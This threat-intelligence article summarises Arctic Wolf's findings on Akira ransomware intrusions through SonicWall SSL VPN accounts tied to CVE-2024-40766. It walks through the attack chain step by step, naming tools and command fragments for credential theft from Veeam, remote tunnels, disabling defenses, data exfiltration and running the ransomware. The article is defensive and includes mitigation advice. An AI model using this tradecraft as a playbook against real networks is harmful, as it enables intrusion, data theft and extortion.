Akira’s SonicWall Blitz: CVE-2024-40766 to Ransomware in Under 4 Hours

A surge of intrusions attributed to the Akira ransomware gang in late July 2025 leveraged SonicWall SSL VPN access tied to CVE-2024-40766, with Arctic Wolf assessing both the speed and intent of the activity as data theft followed rapidly by encryption. Arctic Wolf’s detailed reporting notes, “From this perspective, credentials would have potentially been harvested from devices vulnerable to CVE-2024-40766 and later used by threat actors—even if those same devices were patched. Threat actors in the present campaign successfully authenticated against accounts with the one-time password (OTP) MFA feature enabled.” The campaign began on July 21, 2025, and Arctic Wolf observed that once the actors authenticated, escalation from foothold to impact occurred in a very short window. As the firm puts it, “As before, staging time in the current campaign is typically measured in minutes rather than days or weeks, with malicious logins quickly followed by data exfiltration and Akira ransomware deployment if not promptly contained.” Their guidance is blunt: “The most crucial mitigation to this threat is to reset all SSL VPN credentials on SonicWall devices that have ever run firmware vulnerable to CVE-2024-40766, as well as Active Directory credentials on accounts used for SSL VPN access and LDAP synchronization.” Arctic Wolf further warns, “In almost all intrusions, ransomware encryption took place in under four hours from initial access, with a staging interval as short as 55 minutes in some instances.”

Initial access consistently presented as SSL VPN logins sourced from Virtual Private Server (VPS) hosting infrastructure rather than consumer broadband, SD-WAN, or SASE networks. As Arctic Wolf notes, “legitimate logins typically originate from broadband, SD-WAN, or SASE service providers, logins from VPS infrastructure are far less likely to be benign.” In multiple environments, the login cadence and reuse of the same client IP suggested scripted or semi-automated authentication against compromised accounts. Post-authentication activity began within minutes: reconnaissance and lateral movement pathways were established using external scanners—Advanced IP Scanner and SoftPerfect Network Scanner—alongside port sweeps of “135,” “137,” “445,” and “1433,” laying the blueprint for lateral movement. Telemetry and SMB session setup fingerprints indicated hostnames consistent with “kali,” and Arctic Wolf identified Impacket usage with artifacts supporting the use of “WMIExec” for remote command execution and session discovery. “RDP” was the preferred lateral movement channel, reinforced by domain enumeration via PowerShell (“Get-ADUser,” “Get-ADComputer”) and native tools (e.g., “nltest,” “dsquery”) to map accounts, systems, and shares.

Credential access and privilege operations targeted virtualization and backup planes to unlock a wider blast radius. Actors queried Veeam databases using “sqlcmd” and executed a custom PowerShell script to extract and, when needed, decrypt stored credentials (supporting both MSSQL and PostgreSQL backends), enabling access to virtual machine storage and potential domain artifacts. Persistence tactics combined low-friction account creation—“net.exe” provisioning of local or domain admins with service-looking names such as “sqlbackup” or “veean”—with remote monitoring and management tool placements. “AnyDesk,” “TeamViewer,” and “RustDesk” were fetched via PowerShell’s “Invoke-WebRequest” or “Start-BitsTransfer,” silently installed with “msiexec,” and, in RustDesk cases, registered as a service using “sc create” with an imported config. Arctic Wolf also observed SSH-based reverse tunnels and Cloudflare Tunnel (“cloudflared”) services installed under “C:\ProgramData\ssh,” paired with a host firewall rule created via “New-NetFirewallRule” to expose “sshd,” establishing durable command-and-control pathways across NAT boundaries.

Defense evasion and impact actions were systematic and mapped to Windows internals. Volume Shadow Copies were removed using PowerShell to degrade restoration options, and User Account Control (UAC) was weakened by setting the “LocalAccountTokenFilterPolicy” registry value to enable remote full-token use for local admins. Endpoint protections were impeded with a bring-your-own-vulnerable-driver approach: repackaged “consent.exe” was used to side-load malicious DLLs that loaded kernel-mode drivers (e.g., “rwdrv.sys,” “hlpdrv.sys”) and manipulated ACLs to neutralize security processes without overt termination. Staging for exfiltration relied on “WinRAR” with switches to split archives (“-v3g”), filter recent and business-relevant file types, then transfer via the “FileZilla” SFTP client, rclone, or SSH to VPS endpoints. The final phase executed Akira payloads using drive-scoped commands like “akira.exe -n=1 -p=D:\” or equivalents and share lists (“-s=share.txt”), completing a smash-and-grab cycle that, per Arctic Wolf’s assessment, routinely compressed the entire kill chain into hours.